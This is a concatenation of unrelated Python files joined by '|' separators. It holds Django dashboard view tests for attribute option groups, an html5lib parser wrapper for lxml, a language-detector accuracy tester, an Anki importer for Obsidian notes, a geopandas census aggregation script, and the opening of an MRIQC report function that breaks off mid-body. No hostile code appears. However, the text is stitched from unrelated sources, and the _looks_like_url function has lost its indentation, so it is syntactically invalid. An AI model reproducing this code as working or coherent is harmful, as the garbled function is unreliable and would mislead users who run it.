        # Query-string keys/values understood by RelatedFieldWidgetWrapper.
        self.to_field = AttributeOptionGroup._meta.pk.name
        self.is_popup = RelatedFieldWidgetWrapper.IS_POPUP_VALUE
        self.to_field_var = RelatedFieldWidgetWrapper.TO_FIELD_VAR
        self.is_popup_var = RelatedFieldWidgetWrapper.IS_POPUP_VAR

    def _test_display_pop_up_window_response(self):
        """Assert create/update GET responses carry the full popup context."""
        response = self.response
        self.assertInContext(response, 'to_field')
        self.assertEqual(response.context['to_field'], self.to_field)
        self.assertInContext(response, 'is_popup')
        self.assertEqual(response.context['is_popup'], self.is_popup)
        self.assertInContext(response, 'to_field_var')
        self.assertEqual(response.context['to_field_var'], self.to_field_var)
        self.assertInContext(response, 'is_popup_var')
        self.assertEqual(response.context['is_popup_var'], self.is_popup_var)

    def _test_display_delete_pop_up_window_response(self):
        """Assert delete GET responses carry the popup flags (no to_field)."""
        response = self.response
        self.assertInContext(response, 'is_popup')
        self.assertEqual(response.context['is_popup'], self.is_popup)
        self.assertInContext(response, 'is_popup_var')
        self.assertEqual(response.context['is_popup_var'], self.is_popup_var)

    def _test_pop_up_window_success_response(self):
        """Assert the popup success template renders; stash its JSON payload."""
        response = self.response
        self.assertEqual(response.status_code, http_client.OK)
        self.assertTemplateUsed(response, 'dashboard/widgets/popup_response.html')
        self.assertInContext(response, 'popup_response_data')
        self.popup_response_data = json.loads(response.context['popup_response_data'])

    def _test_create_pop_up_window_success_response(self):
        """Creation payload has value/obj, no action, and no flash messages."""
        self._test_pop_up_window_success_response()
        popup_response_data = self.popup_response_data
        self.assertTrue('value' in popup_response_data)
        self.assertTrue('obj' in popup_response_data)
        self.assertFalse('action' in popup_response_data)
        response = self.response
        messages = list(response.context['messages'])
        self.assertEqual(len(messages), 0)

    def _test_update_pop_up_window_success_response(self):
        """Update payload has action='change' plus value/obj/new_value."""
        self._test_pop_up_window_success_response()
        popup_response_data = self.popup_response_data
        self.assertTrue('action' in popup_response_data)
        self.assertEqual(popup_response_data['action'], 'change')
        self.assertTrue('value' in popup_response_data)
        self.assertTrue('obj' in popup_response_data)
        self.assertTrue('new_value' in popup_response_data)
        response = self.response
        messages = list(response.context['messages'])
        self.assertEqual(len(messages), 0)

    def _test_delete_pop_up_window_success_response(self):
        """Delete payload has action='delete' plus value; no flash messages."""
        self._test_pop_up_window_success_response()
        popup_response_data = self.popup_response_data
        self.assertTrue('action' in popup_response_data)
        self.assertEqual(popup_response_data['action'], 'delete')
        self.assertTrue('value' in popup_response_data)
        response = self.response
        messages = list(response.context['messages'])
        self.assertEqual(len(messages), 0)
class AttributeOptionGroupRegularWindowMixin(object):
    """Assertions shared by tests that drive the views as normal pages."""

    def _test_display_regular_window_response(self):
        """Regular GET responses must not leak any popup context."""
        response = self.response
        self.assertTrue('to_field' not in response.context)
        self.assertTrue('is_popup' not in response.context)
        self.assertTrue('to_field_var' not in response.context)
        self.assertTrue('is_popup_var' not in response.context)

    def _test_regular_window_success_response(self):
        """Successful POSTs redirect to the list page with one INFO flash."""
        response = self.response
        self.assertEqual(response.status_code, http_client.FOUND)
        self.assertRedirectsTo(response, self.success_url_name)
        messages = list(response.follow().context['messages'])
        self.assertEqual(len(messages), 1)
        self.assertEqual(messages[0].level, INFO)
        self.assertEqual(messages[0].message, self.success_message)
class TestAttributeOptionGroupCreateView(AttributeOptionGroupCreateMixin,
                                         AttributeOptionGroupPopUpWindowMixin,
                                         AttributeOptionGroupRegularWindowMixin,
                                         WebTestCase):
    """Create view exercised both as an admin-style popup and a regular page."""
    is_staff = True

    def test_display_create_form_via_popup_window(self):
        """GET with popup query params renders the empty form + popup context."""
        self._set_up_display_create_form_vars()
        self._set_up_pop_up_window_vars()
        url = reverse(self.url_name)
        params = {
            self.to_field_var: self.to_field,
            self.is_popup_var: self.is_popup,
        }
        querystring = urlencode(params)
        url = '%s?%s' % (url, querystring)
        self.response = self.get(url)
        # Test the response
        self._test_display_create_form_response()
        self._test_display_pop_up_window_response()

    def test_display_create_form_via_regular_window(self):
        """Plain GET renders the empty form without popup context."""
        self._set_up_display_create_form_vars()
        self.response = self.get(reverse(self.url_name))
        # Test the response
        self._test_display_create_form_response()
        self._test_display_regular_window_response()

    def test_create_via_popup_window(self):
        """POST with popup params creates the objects and returns popup JSON."""
        self._set_up_create_vars()
        self._set_up_pop_up_window_vars()
        form = self.get(reverse(self.url_name)).form
        form['name'] = self.attribute_option_group_name
        form['options-0-option'] = self.attribute_option_option
        params = dict(form.submit_fields())
        params[self.to_field_var] = self.to_field
        params[self.is_popup_var] = self.is_popup
        self.response = self.post(reverse(self.url_name), params=params)
        # Test the creation of the attribute option group and attribute option
        self._test_creation_of_objects()
        # Test the response
        self._test_create_pop_up_window_success_response()

    def test_create_via_regular_window(self):
        """Plain POST creates the objects and redirects with a success flash."""
        self._set_up_create_vars()
        self._set_up_create_success_vars()
        form = self.get(reverse(self.url_name)).form
        form['name'] = self.attribute_option_group_name
        form['options-0-option'] = self.attribute_option_option
        self.response = form.submit()
        # Test the creation of the attribute option group and attribute option
        self._test_creation_of_objects()
        # Test the response
        self._test_regular_window_success_response()
class TestAttributeOptionGroupUpdateView(AttributeOptionGroupUpdateMixin,
                                         AttributeOptionGroupPopUpWindowMixin,
                                         AttributeOptionGroupRegularWindowMixin,
                                         WebTestCase):
    """Update view exercised both as an admin-style popup and a regular page."""
    is_staff = True

    def setUp(self):
        super().setUp()
        # Each test starts from one persisted group with a single option.
        self.attribute_option_group = AttributeOptionGroupFactory()
        AttributeOptionFactory(group=self.attribute_option_group)

    def test_display_update_form_via_popup_window(self):
        """GET with popup query params renders the bound form + popup context."""
        self._set_up_display_update_form_vars()
        self._set_up_pop_up_window_vars()
        params = {
            self.to_field_var: self.to_field,
            self.is_popup_var: self.is_popup,
        }
        querystring = urlencode(params)
        url = '%s?%s' % (self.url, querystring)
        self.response = self.get(url)
        # Test the response
        self._test_display_update_form_response()
        self._test_display_pop_up_window_response()

    def test_display_update_form_via_regular_window(self):
        """Plain GET renders the bound form without popup context."""
        self._set_up_display_update_form_vars()
        self.response = self.get(self.url)
        # Test the response
        self._test_display_update_form_response()
        self._test_display_regular_window_response()

    def test_update_via_popup_window(self):
        """POST with popup params updates the objects and returns popup JSON."""
        self._set_up_update_vars()
        self._set_up_pop_up_window_vars()
        form = self.get(self.url).form
        form['name'] = self.attribute_option_group_name
        form['options-0-option'] = self.attribute_option_option
        params = dict(form.submit_fields())
        params[self.to_field_var] = self.to_field
        params[self.is_popup_var] = self.is_popup
        self.response = self.post(self.url, params=params)
        # Test the update of the attribute option group and attribute option
        self._test_update_of_objects()
        # Test the response
        self._test_update_pop_up_window_success_response()

    def test_update_via_regular_window(self):
        """Plain POST updates the objects and redirects with a success flash."""
        self._set_up_update_vars()
        self._set_up_update_success_vars()
        form = self.get(self.url).form
        form['name'] = self.attribute_option_group_name
        form['options-0-option'] = self.attribute_option_option
        self.response = form.submit()
        # Test the update of the attribute option group and attribute option
        self._test_update_of_objects()
        # Test the response
        self._test_regular_window_success_response()
class TestAttributeOptionGroupListView(WebTestCase):
    """Attribute-option-group list view, visited as a staff user."""
    is_staff = True

    def test_display_pagination_navigation(self):
        """1.5 pages worth of groups must paginate into exactly two pages."""
        url_name = 'dashboard:catalogue-attribute-option-group-list'
        per_page = settings.IZI_DASHBOARD_ITEMS_PER_PAGE
        name_template = 'Test Attribute Option Group #%d'
        total_groups = int(1.5 * per_page)
        for number in range(total_groups):
            AttributeOptionGroupFactory(name=name_template % number)
        page = self.get(reverse(url_name))
        # Test the pagination
        self.assertContains(page, 'Page 1 of 2')
class TestAttributeOptionGroupDeleteView(AttributeOptionGroupDeleteMixin,
                                         AttributeOptionGroupPopUpWindowMixin,
                                         AttributeOptionGroupRegularWindowMixin,
                                         WebTestCase):
    """Delete view exercised both as an admin-style popup and a regular page."""
    is_staff = True

    def setUp(self):
        super().setUp()
        # Each test starts from one persisted group with a single option.
        self.attribute_option_group = AttributeOptionGroupFactory()
        AttributeOptionFactory(group=self.attribute_option_group)

    def test_display_delete_form_via_popup_window(self):
        """GET with popup param renders the confirmation + popup flags."""
        self._set_up_display_delete_form_vars()
        self._set_up_display_delete_form_allowed_vars()
        self._set_up_pop_up_window_vars()
        params = {
            self.is_popup_var: self.is_popup,
        }
        querystring = urlencode(params)
        url = '%s?%s' % (self.url, querystring)
        self.response = self.get(url)
        # Test the response
        self._test_display_delete_form_response()
        self._test_display_delete_pop_up_window_response()

    def test_display_delete_disallowed_via_popup_window(self):
        """A referencing product attribute blocks deletion (popup variant)."""
        self._set_up_display_delete_form_vars()
        self._set_up_display_delete_form_disallowed_vars()
        self._set_up_pop_up_window_vars()
        ProductAttributeFactory(
            type='multi_option', name='Sizes', code='sizes', option_group=self.attribute_option_group)
        params = {
            self.is_popup_var: self.is_popup,
        }
        querystring = urlencode(params)
        url = '%s?%s' % (self.url, querystring)
        self.response = self.get(url)
        # Test the response
        self._test_display_delete_form_response()
        self._test_display_delete_disallowed_response()
        self._test_display_delete_pop_up_window_response()

    def test_display_delete_form_via_regular_window(self):
        """Plain GET renders the confirmation without popup context."""
        self._set_up_display_delete_form_vars()
        self._set_up_display_delete_form_allowed_vars()
        self.response = self.get(self.url)
        # Test the response
        self._test_display_delete_form_response()
        self._test_display_regular_window_response()

    def test_display_disallowed_delete_via_regular_window(self):
        """A referencing product attribute blocks deletion (regular variant)."""
        self._set_up_display_delete_form_vars()
        self._set_up_display_delete_form_disallowed_vars()
        ProductAttributeFactory(
            type='multi_option', name='Sizes', code='sizes', option_group=self.attribute_option_group)
        self.response = self.get(self.url)
        # Test the response
        self._test_display_delete_form_response()
        self._test_display_delete_disallowed_response()
        self._test_display_regular_window_response()

    def test_delete_via_popup_window(self):
        """POST with popup param deletes the objects and returns popup JSON."""
        self._set_up_delete_vars()
        self._set_up_pop_up_window_vars()
        form = self.get(self.url).form
        params = dict(form.submit_fields())
        params[self.is_popup_var] = self.is_popup
        self.response = self.post(self.url, params=params)
        # Test the deletion of the attribute option group and attribute option
        self._test_deletion_of_objects()
        # Test the response
        self._test_delete_pop_up_window_success_response()

    def test_delete_via_regular_window(self):
        """Plain POST deletes the objects and redirects with a success flash."""
        self._set_up_delete_vars()
        self._set_up_delete_success_vars()
        form = self.get(self.url).form
        self.response = form.submit()
        # Test the deletion of the attribute option group and attribute option
        self._test_deletion_of_objects()
        # Test the response
        self._test_regular_window_success_response()
|
"""
An interface to html5lib that mimics the lxml.html interface.
"""
import sys
import string
from html5lib import HTMLParser as _HTMLParser
from html5lib.treebuilders.etree_lxml import TreeBuilder
from lxml import etree
from lxml.html import Element, XHTML_NAMESPACE, _contains_block_level_tag
# python3 compatibility
try:
    # Python 2: basestring covers both str and unicode.
    _strings = basestring
except NameError:
    # Python 3: accept both bytes and str.
    _strings = (bytes, str)
try:
    from urllib2 import urlopen
except ImportError:
    from urllib.request import urlopen
try:
    from urlparse import urlparse
except ImportError:
    from urllib.parse import urlparse
class HTMLParser(_HTMLParser):
    """An html5lib HTML parser with lxml as tree."""

    def __init__(self, strict=False, **kwargs):
        # Force the lxml etree TreeBuilder so parse results are lxml elements.
        _HTMLParser.__init__(self, strict=strict, tree=TreeBuilder, **kwargs)
# XHTML support is optional in html5lib; only define the XHTML parser (and
# its module-level default instance) when it is available.
try:
    from html5lib import XHTMLParser as _XHTMLParser
except ImportError:
    pass
else:
    class XHTMLParser(_XHTMLParser):
        """An html5lib XHTML Parser with lxml as tree."""

        def __init__(self, strict=False, **kwargs):
            _XHTMLParser.__init__(self, strict=strict, tree=TreeBuilder, **kwargs)

    xhtml_parser = XHTMLParser()
def _find_tag(tree, tag):
    """Find *tag* in *tree*, trying the plain name first and then the
    XHTML-namespaced variant; return None when neither exists."""
    for candidate in (tag, "{%s}%s" % (XHTML_NAMESPACE, tag)):
        found = tree.find(candidate)
        if found is not None:
            return found
    return None
def document_fromstring(html, guess_charset=None, parser=None):
    """
    Parse a whole document from a string, returning its root element.

    If `guess_charset` is true, or if the input is not Unicode but a
    byte string, the `chardet` library will perform charset guessing
    on the string.
    """
    if not isinstance(html, _strings):
        raise TypeError("string required")

    if parser is None:
        parser = html_parser

    options = {}
    if guess_charset is None and isinstance(html, bytes):
        # html5lib does not accept useChardet as an argument, if it
        # detected the html argument would produce unicode objects.
        guess_charset = True
    if guess_charset is not None:
        options["useChardet"] = guess_charset
    return parser.parse(html, **options).getroot()
def fragments_fromstring(html, no_leading_text=False, guess_charset=None, parser=None):
    """Parses several HTML elements, returning a list of elements.

    The first item in the list may be a string.  If no_leading_text is
    true, then it will be an error if there is leading text, and it will
    always be a list of only elements.

    If `guess_charset` is true, the `chardet` library will perform charset
    guessing on the string.
    """
    if not isinstance(html, _strings):
        raise TypeError("string required")

    active_parser = html_parser if parser is None else parser

    options = {}
    if guess_charset is None and isinstance(html, bytes):
        # html5lib does not accept useChardet as an argument, if it
        # detected the html argument would produce unicode objects.
        guess_charset = False
    if guess_charset is not None:
        options["useChardet"] = guess_charset

    children = active_parser.parseFragment(html, "div", **options)
    if children and isinstance(children[0], _strings) and no_leading_text:
        leading = children[0]
        if leading.strip():
            raise etree.ParserError("There is leading text: %r" % leading)
        del children[0]
    return children
def fragment_fromstring(html, create_parent=False, guess_charset=None, parser=None):
    """Parses a single HTML element; it is an error if there is more than
    one element, or if anything but whitespace precedes or follows the
    element.

    If 'create_parent' is true (or is a tag name) then a parent node
    will be created to encapsulate the HTML in a single element.  In
    this case, leading or trailing text is allowed.

    If `guess_charset` is true, the `chardet` library will perform charset
    guessing on the string.
    """
    if not isinstance(html, _strings):
        raise TypeError("string required")

    # Leading text is only tolerated when everything gets wrapped anyway.
    accept_leading_text = bool(create_parent)
    elements = fragments_fromstring(
        html,
        guess_charset=guess_charset,
        parser=parser,
        no_leading_text=not accept_leading_text,
    )

    if create_parent:
        if not isinstance(create_parent, _strings):
            create_parent = "div"
        wrapper = Element(create_parent)
        if elements and isinstance(elements[0], _strings):
            # Move any leading text onto the wrapper element.
            wrapper.text = elements[0]
            del elements[0]
        wrapper.extend(elements)
        return wrapper

    if not elements:
        raise etree.ParserError("No elements found")
    if len(elements) > 1:
        raise etree.ParserError("Multiple elements found")
    result = elements[0]
    if result.tail and result.tail.strip():
        raise etree.ParserError("Element followed by text: %r" % result.tail)
    result.tail = None
    return result
def fromstring(html, guess_charset=None, parser=None):
    """Parse the html, returning a single element/document.

    This tries to minimally parse the chunk of text, without knowing if it
    is a fragment or a document.

    If `guess_charset` is true, or if the input is not Unicode but a
    byte string, the `chardet` library will perform charset guessing
    on the string.
    """
    # NOTE(review): an earlier docstring mentioned a 'base_url' argument,
    # but this function takes no such parameter.
    if not isinstance(html, _strings):
        raise TypeError("string required")
    doc = document_fromstring(html, parser=parser, guess_charset=guess_charset)

    # document starts with doctype or <html>, full document!
    start = html[:50]
    if isinstance(start, bytes):
        # Allow text comparison in python3.
        # Decode as ascii, that also covers latin-1 and utf-8 for the
        # characters we need.
        start = start.decode("ascii", "replace")

    start = start.lstrip().lower()
    if start.startswith("<html") or start.startswith("<!doctype"):
        return doc

    head = _find_tag(doc, "head")

    # if the head is not empty we have a full document
    if len(head):
        return doc

    body = _find_tag(doc, "body")

    # The body has just one element, so it was probably a single
    # element passed in
    if (
        len(body) == 1
        and (not body.text or not body.text.strip())
        and (not body[-1].tail or not body[-1].tail.strip())
    ):
        return body[0]

    # Now we have a body which represents a bunch of tags which have the
    # content that was passed in. We will create a fake container, which
    # is the body tag, except <body> implies too much structure.
    if _contains_block_level_tag(body):
        body.tag = "div"
    else:
        body.tag = "span"
    return body
def parse(filename_url_or_file, guess_charset=None, parser=None):
    """Parse a filename, URL, or file-like object into an HTML document
    tree.  Note: this returns a tree, not an element.  Use
    ``parse(...).getroot()`` to get the document root.

    If ``guess_charset`` is true, the ``useChardet`` option is passed into
    html5lib to enable character detection.  This option is on by default
    when parsing from URLs, off by default when parsing from file(-like)
    objects (which tend to return Unicode more often than not), and on by
    default when parsing from a file path (which is read in binary mode).
    """
    if parser is None:
        parser = html_parser
    if not isinstance(filename_url_or_file, _strings):
        fp = filename_url_or_file
        if guess_charset is None:
            # assume that file-like objects return Unicode more often than bytes
            guess_charset = False
    elif _looks_like_url(filename_url_or_file):
        fp = urlopen(filename_url_or_file)
        if guess_charset is None:
            # assume that URLs return bytes
            guess_charset = True
    else:
        # Treat the string as a local file path, read in binary mode.
        fp = open(filename_url_or_file, "rb")
        if guess_charset is None:
            guess_charset = True

    options = {}
    # html5lib does not accept useChardet as an argument, if it
    # detected the html argument would produce unicode objects.
    # Deliberately a truthiness test: a False value must NOT be forwarded,
    # per the constraint described in the comment above.
    if guess_charset:
        options["useChardet"] = guess_charset
    return parser.parse(fp, **options)
def _looks_like_url(str):
scheme = urlparse(str)[0]
if not scheme:
return False
elif (
sys.platform == "win32" and scheme in string.ascii_letters and len(scheme) == 1
):
# looks like a 'normal' absolute path
return False
else:
return True
# Module-level default parser instance used by the *_fromstring()/parse() helpers.
html_parser = HTMLParser()
|
"""
Accuracy tester of Shaman
Usage:
shaman-tester <test_set.csv> [--model-path <model_path>]
python -m shamanld.tester <test_set.csv> [--model-path <model_path>]
:author: Prev(prevdev@gmail.com)
:license: MIT
"""
import sys
import os
import csv
import argparse
from . import shaman
def main():
    """Command-line entry point: parse arguments, build a detector and run
    the accuracy test.

    Exits with a non-zero status when the CSV file does not exist.
    """
    aparser = argparse.ArgumentParser()
    aparser.add_argument(
        'path', type=str,
        # Typo fix: "foramt" -> "format" in the user-visible help text.
        help='Path of the CSV file to test accuracy of Shaman ("language, code" format)')
    aparser.add_argument('--model-path', type=str,
                         help='Model file path to use', default=None)
    args = aparser.parse_args()

    if not os.path.exists(args.path):
        # Grammar fix in the user-facing error message.
        print('File does not exist: ' + args.path)
        sys.exit(-1)

    if args.model_path:
        print('Use model on %s' % args.model_path)
        detector = shaman.Shaman(args.model_path)
    else:
        detector = shaman.Shaman.default()

    test_with_bunch(args.path, detector)
def test_with_bunch(filepath, detector):
    """Test shaman with a code bunch (CSV of ``language, code`` rows) and
    print per-language accuracy statistics.

    Rows whose language is not in ``detector.model['languages']`` are
    excluded from the totals.  Fix: guard against a ZeroDivisionError when
    the file is empty or every row is filtered out.
    """
    print('Load CSV file')
    csv.field_size_limit(sys.maxsize)  # Set CSV limit to sys.maxsize

    filedata = []
    with open(filepath) as csvfile:
        reader = csv.reader(csvfile, delimiter=',')
        for row in reader:
            filedata.append(row)

    correct = 0
    totals = len(filedata)
    results = {}

    print('Start testing')
    for index, (language, code) in enumerate(filedata):
        print('Testing %s/%s ' % (index, len(filedata)), end="\r")
        if language not in detector.model['languages']:
            # Language unknown to the model: exclude it from statistics.
            totals -= 1
            continue
        if language not in results:
            # [correct, attempted, accuracy] per language.
            results[language] = [0, 0, 0]
        try:
            inferenced = detector.detect(code)[0][0]
        except IndexError:
            # detect() returned no candidates at all.
            inferenced = None
        if inferenced == language:
            correct += 1
            results[language][0] += 1
        results[language][1] += 1
        results[language][2] = results[language][0] / results[language][1]

    if totals == 0:
        # BUG FIX: previously 'correct / totals' raised ZeroDivisionError
        # when the file was empty or every row was filtered out.
        print('No testable rows found in %s' % filepath)
        return

    print('| Language | Accuracy |')
    print('|--------------|---------------------------|')
    print_table_row(
        'Total',
        '%.2lf%% (%d / %d)' % (correct / totals * 100, correct, totals),
        12,
        25,
    )
    results = sorted(results.items(), key=lambda x: x[1][0], reverse=True)
    for lang, l in results:
        print_table_row(
            lang,
            '%.2lf%% (%d / %d)' % (l[2] * 100, l[0], l[1]),
            12,
            25,
        )
def print_table_row(col1, col2, col1_len, col2_len):
    """Print one markdown-style table row, left-padding each column to the
    given width (columns longer than the width are printed unchanged)."""
    padded_first = col1.ljust(col1_len)
    padded_second = col2.ljust(col2_len)
    print('| %s | %s |' % (padded_first, padded_second))
# Allow direct invocation: ``python -m shamanld.tester <test_set.csv>``.
if __name__ == '__main__':
    main()
|
#!/usr/bin/env python3
import os
import shutil
from . import settings
from aqt import mw
from anki.cards import Card
from anki.notes import Note
from anki.collection import Collection
from aqt.utils import showInfo
def importer(my_files_catalog):
    """Import every catalogued vault file into Anki, then clean up the
    vault trash and remove decks left empty by the sync."""
    for catalog_entry in my_files_catalog:
        importer_to_anki(catalog_entry)
    empty_trash()
    delete_empty_decks()
def importer_to_anki(file):
    """Sync a single vault file into Anki.

    Behaviour depends on the file's location:
    - under ``/.trash``: delete the matching note(s);
    - under a configured archive folder: delete the matching note(s);
    - otherwise: update the existing note in place, or create a new note
      in the deck derived from the file's path.

    BUG FIX: when the "archive folder" setting was empty, ``archive_folders``
    was never assigned and the loop below raised NameError; an empty list
    now makes the archive check a no-op.
    """
    archive_folder_input = settings.get_settings_by_name("archive folder")
    if archive_folder_input == "":
        archive_folders = []
    elif archive_folder_input.find("\n") != -1:
        # Multiple archive folders, one per line.
        archive_folders = archive_folder_input.split("\n")
    else:
        archive_folders = [archive_folder_input]

    is_in_archive_folder = False
    for archive_folder in archive_folders:
        archive_folder = archive_folder.lstrip(" ")
        archive_folder = archive_folder.rstrip(" ")
        archive_folder = "/" + archive_folder
        if file.get_file_relative_path().startswith(archive_folder) and archive_folder != "" and archive_folder != "\n":
            is_in_archive_folder = True

    if file.get_file_relative_path().startswith("/.trash"):
        # File was moved to the vault's trash: remove its note(s) from Anki.
        uid = file.get_file_uid()
        note_list = mw.col.find_notes(uid)
        if len(note_list) > 0:
            for single_note_id in note_list:
                single_note = mw.col.getNote(single_note_id)
                try:
                    if single_note["UID"] == uid:
                        mw.col.remNotes([single_note_id])
                except KeyError:
                    # Note model has no UID field; leave it untouched.
                    pass
    elif is_in_archive_folder:  # or file.get_file_root_folder() == settings.get_settings_by_name("ignore folder")
        # Archived files are likewise removed from Anki.
        uid = file.get_file_uid()
        note_list = mw.col.find_notes(uid)
        if len(note_list) > 0:
            for single_note_id in note_list:
                single_note = mw.col.getNote(single_note_id)
                if single_note["UID"] == uid:
                    mw.col.remNotes([single_note_id])
    else:
        deck_id = mw.col.decks.id(file.get_deck_name())
        mw.col.decks.select(deck_id)
        card_model = mw.col.models.byName("Obsidianki4")
        uid = file.get_file_uid()
        note_list = mw.col.find_notes(uid)
        found_existing_file = False
        if len(note_list) > 0:
            # Update every matching Obsidianki4 note in place.
            for single_note_id in note_list:
                single_note = mw.col.getNote(single_note_id)
                if single_note.model() == card_model:
                    if single_note["UID"] == uid:
                        if file.get_cloze_or_basic():
                            single_note["Cloze"] = file.get_file_content()
                            single_note["Text"] = ""
                        else:
                            # Basic card: keep a placeholder cloze on the model.
                            single_note["Cloze"] = "{{c1::}}"
                            single_note["Text"] = file.get_file_content()
                        back_extra = "Source: " + file.get_file_name_with_url()
                        single_note["Back Extra"] = back_extra
                        single_note.tags = []
                        for tag in file.get_tags():
                            single_note.tags.append(tag)
                        try:
                            # Newer Anki API to move the note's cards.
                            card_ids = mw.col.card_ids_of_note(single_note_id)
                            mw.col.set_deck(card_ids, deck_id)
                        except AttributeError:
                            # Older Anki API fallback.
                            card_ids = mw.col.find_cards(uid)
                            mw.col.decks.setDeck(card_ids, deck_id)
                        single_note.flush()
                        found_existing_file = True
        if not found_existing_file:
            try:
                # Point the deck at the Obsidianki4 model before adding.
                deck = mw.col.decks.get(deck_id)
                deck["mid"] = card_model["id"]
                mw.col.decks.save(deck)
                note_object = mw.col.newNote(deck_id)
                if file.get_cloze_or_basic():
                    note_object["Cloze"] = file.get_file_content()
                    note_object["Text"] = ""
                else:
                    note_object["Cloze"] = "{{c1::}}"
                    note_object["Text"] = file.get_file_content()
                note_object["UID"] = uid
                back_extra = "Source: " + file.get_file_name_with_url()
                note_object["Back Extra"] = back_extra
                for tag in file.get_tags():
                    note_object.tags.append(tag)
                mw.col.add_note(note_object, deck_id)
            except TypeError:
                # NOTE(review): silently swallowing TypeError here mirrors the
                # original behaviour (likely guarding an Anki API mismatch);
                # confirm before surfacing it.
                pass
def delete_empty_decks():
    """Remove every deck that no longer contains cards.

    NOTE: despite its name, deck_has_cards() returns True for EMPTY decks
    (and never for the default deck id 1), so this loop deletes exactly the
    card-less decks.
    """
    for entry in mw.col.decks.all_names_and_ids():
        # The entry is an opaque object; its string form starts with an
        # "id: <number>" line, which is parsed here to recover the deck id.
        first_line = str(entry).split("\n")[0]
        deck_id = int(first_line.split(": ")[1])
        if deck_has_cards(deck_id):
            mw.col.decks.rem(deck_id, True, True)
def empty_trash():
    """Delete everything inside each vault's ".trash" directory.

    The "vault path" setting may contain several paths separated by newlines.
    Paths are stripped of surrounding spaces; missing .trash directories are
    ignored.
    """
    path_s = settings.get_settings_by_name("vault path")
    if path_s == "":
        # BUG FIX: the original fell through to `for path in paths` with
        # `paths` undefined (NameError); return instead.
        return
    # BUG FIX: str.find() returns -1 (truthy!) when no newline exists, so the
    # original `elif path_s.find("\n")` branch logic was wrong, and its else
    # branch referenced the undefined name `paths`.  Splitting unconditionally
    # handles both the single-path and the multi-path case.
    paths = path_s.split("\n")
    for path in paths:
        path = path.strip(" ")
        # TODO: Add this to settings
        if path != "":
            trash_can_path = path + "/" + ".trash"
            try:
                for trash_entry in os.listdir(trash_can_path):
                    trash_entry_path = trash_can_path + "/" + trash_entry
                    try:
                        shutil.rmtree(trash_entry_path)
                    except NotADirectoryError:
                        # Plain file inside .trash
                        os.remove(trash_entry_path)
            except (NotADirectoryError, FileNotFoundError):
                # Vault has no .trash directory (or the path is not a
                # directory); nothing to clean for this vault.
                pass
def deck_has_cards(deck_id):
    """Return True when the deck is EMPTY (contains zero cards).

    NOTE(review): the name is misleading -- callers such as
    delete_empty_decks() rely on a True result meaning "safe to delete".
    Deck 1 (the default deck) is always reported as non-empty.
    """
    if deck_id == 1:
        return False
    try:
        # Newer Anki API: ask the collection for the card count directly.
        return mw.col.decks.card_count(deck_id, True) == 0
    except AttributeError:
        # Older Anki API: fall back to listing the deck's card ids.
        return len(mw.col.decks.cids(deck_id, True)) == 0
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 24 10:34:28 2020
@author: bdobson
"""
import os
import geopandas as gpd
import pandas as pd
from shapely.geometry import Point
#Addresses
# NOTE: data_root is a machine-specific absolute path; adjust before running.
data_root = os.path.join("C:\\","Users","bdobson","Documents","data","population_data")
shape_fn = os.path.join("example_shape.shp")
pop_fn = os.path.join(data_root, "household_size.csv") # from https://www.nomisweb.co.uk/census/2011/qs406uk
loc_fn = os.path.join(data_root, "NSPL_NOV_2019_UK.csv") # https://geoportal.statistics.gov.uk/datasets/national-statistics-postcode-lookup-november-2019
oa_fn = os.path.join(data_root, "oa_2_postcode.csv") # https://geoportal.statistics.gov.uk/datasets/80628f9289574ba4b39a76ca7830b7e9_0/data
#Load and format
# Postcode -> OS grid location lookup (pcds = postcode, oseast1m/osnrth1m =
# OS easting/northing columns of the NSPL).
loc_df = pd.read_csv(loc_fn, sep=',')
loc_df = loc_df[['pcds','oseast1m','osnrth1m']]
# Output-area -> postcode lookup, joined to coordinates on postcode.
oa_df = pd.read_csv(oa_fn, sep=',')
oa_df = pd.merge(oa_df,loc_df, on = 'pcds')
oa_df = oa_df[['oa11', 'oseast1m', 'osnrth1m']]
gdf = gpd.read_file(shape_fn)
#Make geoms and combine
# One point per output-area postcode; assumes the shapefile CRS matches the
# easting/northing coordinates -- TODO confirm.
oa_df['geometry'] = [Point(xy) for xy in zip(oa_df.oseast1m, oa_df.osnrth1m)]
oa_df = gpd.GeoDataFrame(oa_df, crs = gdf.crs)
# Keep output areas whose point falls inside a zone polygon.
oas_of_interest = gpd.sjoin(gdf, oa_df, op="contains")
oas_of_interest = oas_of_interest[['zone_name', 'oa11']].drop_duplicates()
#Load pop
pop_df = pd.read_csv(pop_fn, sep=',')
#Merge and sum
df = pd.merge(oas_of_interest, pop_df, left_on = 'oa11', right_on = 'geography')
gb = df.drop('date',axis=1).groupby('zone_name').sum()
#Add population
# Columns 1..8 are assumed to be household counts by household size
# (1-person .. 8-or-more-person) -- TODO confirm against the census CSV.
# NOTE(review): the 8+ band is multiplied by exactly 8, so households larger
# than eight people are slightly undercounted.
gb['total_population'] = 0
for i in range(1,9):
    gb['total_population'] += gb.iloc[:,i] * i
gb.columns = ['total_households'] + [str(x) + '_person' for x in range(1,9)] + ['total_population']
gb = gb.rename(columns = {'8_person' : '8+_person'})
#Print
gb.to_csv('formatted_population_data.csv', sep=',')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
# pylint: disable=no-member
#
# @Author: oesteban
# @Date: 2016-01-05 11:33:39
# @Email: code@oscaresteban.es
# @Last modified by: oesteban
""" Encapsulates report generation functions """
def individual_html(in_iqms, in_plots=None, api_id=None):
    """Generate the individual HTML report for one input image.

    Parameters
    ----------
    in_iqms : str or Path
        Path to the JSON file of image-quality metrics (IQMs).
    in_plots : list or None
        Paths of report snippets to embed, ordered to match
        ``REPORT_TITLES[modality]``.
    api_id :
        Accepted but not used in this function body.

    Returns
    -------
    str
        Absolute path of the generated HTML file.
    """
    from pathlib import Path
    import datetime
    from json import load
    from mriqc import logging, __version__ as ver
    from mriqc.utils.misc import BIDS_COMP
    from mriqc.reports import REPORT_TITLES
    from mriqc.reports.utils import iqms2html, read_report_snippet
    from mriqc.data import IndividualTemplate
    report_log = logging.getLogger('mriqc.report')

    def _get_details(in_iqms, modality):
        # Pop provenance out of the IQMs dict (mutates the caller's dict) and
        # build the list of workflow-detail messages shown in the report.
        in_prov = in_iqms.pop('provenance', {})
        warn_dict = in_prov.pop('warnings', None)
        sett_dict = in_prov.pop('settings', None)
        wf_details = []
        if modality == 'bold':
